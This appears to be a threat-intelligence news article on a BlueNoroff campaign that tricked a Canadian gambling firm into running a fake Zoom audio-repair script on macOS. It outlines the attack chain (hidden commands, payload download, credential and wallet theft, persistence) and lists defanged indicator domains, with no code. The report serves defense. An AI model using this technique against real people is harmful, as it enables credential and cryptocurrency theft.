The Field Effect Analysis team found a targeted scam linked to BlueNoroff, a North Korean hacker subgroup. A known gambling company from Canada got caught in this plan, which used trusted identity tricks and Zoom. BlueNoroff’s sophisticated method included fake domains such as zoom-tech[.]us to target the victim during a meeting about cryptocurrency.

Attackers claimed there were audio problems and asked the person to run a script named as a Zoom audio repair file. Official report states the script included thousands of blank lines to hide its true, harmful commands. Hidden malware soon followed, enabling theft of sensitive data such as login credentials and browser account profiles.

This attack displayed technical precision combined with skills in psychological pressure and trickery. First, the code moved the victim to zoom-tech[.]us, which WHOIS records show was registered on April 14, 2025. Investigation found this domain connects with others using the same misleading WHOIS data. When triggered, the script used CURL and ZSH to fetch more files and a password-harvesting payload.

BlueNoroff Malware Campaign Targets Crypto Wallets with Stealthy macOS Attacks

Stolen user account passwords were sent out during this step, pointing to dangerous credential theft. After that, a LaunchDaemon setup put persistent malware in place, making it run whenever the system starts. Malware used names like “Wi-Fi Updater” and injected its code into other macOS tasks using special entitlements. Meanwhile, different routines in the malware grabbed browser data, system info, and keychain files using RSYNC and CURL.

Cryptocurrency wallets in browsers such as Brave were targeted in these parallel collection stages. Temporary directories and deleting tactic files after running kept the malware presence very low and hard to track. Attackers used C2 domains like ajayplamingo[.]com and zmwebsdk[.]com to send stolen data out of the device. This campaign has been active from at least March 2025 and continues to aim at cryptocurrency operators.

BlueNoroff’s operations have expanded across North America, South Korea, Japan, and Europe, underlining a global financial motive. Cyber security teams should watch for the given signs, block unapproved scripts, and train users to resist social engineering.